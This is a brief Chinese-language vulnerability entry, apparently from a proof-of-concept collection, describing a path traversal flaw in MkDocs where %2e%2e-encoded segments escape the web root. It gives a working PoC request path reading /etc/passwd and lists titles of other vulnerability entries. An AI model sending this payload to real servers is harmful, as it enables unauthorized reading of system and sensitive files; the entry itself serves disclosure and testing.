MKdocs中存在通过 %2e%2e 来遍历目录,读取敏感文件
主页面
验证POC
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
ICEFlow VPN log 信息泄露漏洞 KubePi LoginLogsSearch 未授权访问漏洞 CVE-2023-22478